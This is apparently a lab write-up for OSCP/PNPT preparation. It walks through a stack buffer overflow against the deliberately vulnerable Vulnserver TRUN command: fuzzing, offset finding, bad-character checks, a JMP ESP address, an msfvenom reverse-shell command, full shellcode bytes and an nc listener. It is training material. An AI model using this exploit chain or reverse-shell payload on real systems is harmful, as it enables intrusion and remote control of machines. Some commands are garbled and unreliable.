Buffer Over Flow
This write up is about Buffer over flow which is an indispensable for the guys preparing for OSCP/PNPT. Here we tried to cover step by step BOF of a vulnerable server.
Get vulnerable server
Run server at port 9999
write py code and connect
we can check same response for verification from kali
nc 192.168.100.7 9999
send “HELP” from code
output
here we can see various commands which we can use to check or verify overflow
for this test we are using TRUN command
syntax for TRUN
payload = ‘TRUN /. :/’ + junk
now send junk bytes to check approx. value when server crush
Open the application in immunity debugger
(Run fuzzer.py from script to show fuzzing)
Crashed at 2000 bytes
Running process
Send 5000 A in the process
can see process crashed
can see all A here on ESP and EIP ( 41 Hexa — of value A)
Using pattern generation script to create pattern (can use other options metasploit or mona)
value 5000
out unique payload is created
copy this payload in script
now send pattern to vulnserver from script
Variable use pat =
we can see server is crushed
Go to ESP and right click and “follow in stack”
in stack right click and copy to clipboard
009CF9C8 417A6F32 2ozA esp
we can notice the EIP value, just top of ESP value
009CF9C4 4B594237 7BYK EIP
make sure application is running
now we will find out the index of bytes in eip and esp
comment s.send (payload)
rerun the application
run script
after running we can see index number
which shows EIP 2003 and ESP 2007
which means after 2003 A value of EIP start and ESP start at 2007
for confirmation we will alter the script and send it
junk = ‘A’ *2003
eip= ‘B’*4
esp=’c’*4
junk2 = ‘D’*(5000 — len(junk+eip+esp)
payload = ‘TRUN /.:/’ + junk + eip + esp + junk2
make sure application is running
after running code server crashed
see ESP all C and EIP all B which we send so its verified offset is right
FIND BAD CHARACTER
!mona config -set workingfolder C:\mona\%p
!mona bytearray -b “\x00”
created file here in folder
copy characters from the file bytearray.txt to code
create new variable allchars
send allchars in esp
Run program again
!mona compare -f C:\mona\vulnserver\bytearray.bin -a 00AAF9C8
00AAF9C8 : memory address of ESP
memory comparison result.
Unmodified means no extra bad character identified. So only bad character is “\X00”
it shows no value, which means only \x00 was null character which we initially excluded.
Restart the application
!mona jmp -r esp –cpb “\x “+00”
check why this is done: find the address of esp
625011AF
change the code with esp memory address
625011AF
since there is no bad character we can safely use this esp address
add nops 2 rows
esp = ‘\x90’*16
esp += ()
prepare shellcode in kali with metaspolit
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.100.5 lport=4444 -a x86 “\x00” -f c
code the shell code
unsigned char buf[] =
“\xba\x3f\x6b\x79\x15\xdb\xc7\xd9\x74\x24\xf4\x58\x29\xc9\xb1”
“\x52\x83\xc0\x04\x31\x50\x0e\x03\x6f\x65\x9b\xe0\x73\x91\xd9”
“\x0b\x8b\x62\xbe\x82\x6e\x53\xfe\xf1\xfb\xc4\xce\x72\xa9\xe8”
“\xa5\xd7\x59\x7a\xcb\xff\x6e\xcb\x66\x26\x41\xcc\xdb\x1a\xc0”
“\x4e\x26\x4f\x22\x6e\xe9\x82\x23\xb7\x14\x6e\x71\x60\x52\xdd”
“\x65\x05\x2e\xde\x0e\x55\xbe\x66\xf3\x2e\xc1\x47\xa2\x25\x98”
“\x47\x45\xe9\x90\xc1\x5d\xee\x9d\x98\xd6\xc4\x6a\x1b\x3e\x15”
“\x92\xb0\x7f\x99\x61\xc8\xb8\x1e\x9a\xbf\xb0\x5c\x27\xb8\x07”
“\x1e\xf3\x4d\x93\xb8\x70\xf5\x7f\x38\x54\x60\xf4\x36\x11\xe6”
“\x52\x5b\xa4\x2b\xe9\x67\x2d\xca\x3d\xee\x75\xe9\x99\xaa\x2e”
“\x90\xb8\x16\x80\xad\xda\xf8\x7d\x08\x91\x15\x69\x21\xf8\x71”
“\x5e\x08\x02\x82\xc8\x1b\x71\xb0\x57\xb0\x1d\xf8\x10\x1e\xda”
“\xff\x0a\xe6\x74\xfe\xb4\x17\x5d\xc5\xe1\x47\xf5\xec\x89\x03”
“\x05\x10\x5c\x83\x55\xbe\x0f\x64\x05\x7e\xe0\x0c\x4f\x71\xdf”
“\x2d\x70\x5b\x48\xc7\x8b\x0c\xb7\xb0\xf7\xc9\x5f\xc3\xf7\xc0”
“\xc3\x4a\x11\x88\xeb\x1a\x8a\x25\x95\x06\x40\xd7\x5a\x9d\x2d”
“\xd7\xd1\x12\xd2\x96\x11\x5e\xc0\x4f\xd2\x15\xba\xc6\xed\x83”
“\xd2\x85\x7c\x48\x22\xc3\x9c\xc7\x75\x84\x53\x1e\x13\x38\xcd”
“\x88\x01\xc1\x8b\xf3\x81\x1e\x68\xfd\x08\xd2\xd4\xd9\x1a\x2a”
“\xd4\x65\x4e\xe2\x83\x33\x38\x44\x7a\xf2\x92\x1e\xd1\x5c\x72”
“\xe6\x19\x5f\x04\xe7\x77\x29\xe8\x56\x2e\x6c\x17\x56\xa6\x78”
“\x60\x8a\x56\x86\xbb\x0e\x66\xcd\xe1\x27\xef\x88\x70\x7a\x72”
“\x2b\xaf\xb9\x8b\xa8\x45\x42\x68\xb0\x2c\x47\x34\x76\xdd\x35”
“\x25\x13\xe1\xea\x46\x36”;
paste shellcode in the py code esp
esp += (shellcode)
create listener on port 4444
payload = ‘TRUN /.:/’ + junk + eip + nop + esp + junk2
nc -nvlp 4444
make sure application running
after executing the program, we will get reverse shell executed
Hope this will helpful. Happy Hacking :)
DM me if stuck anywhere or needs help :)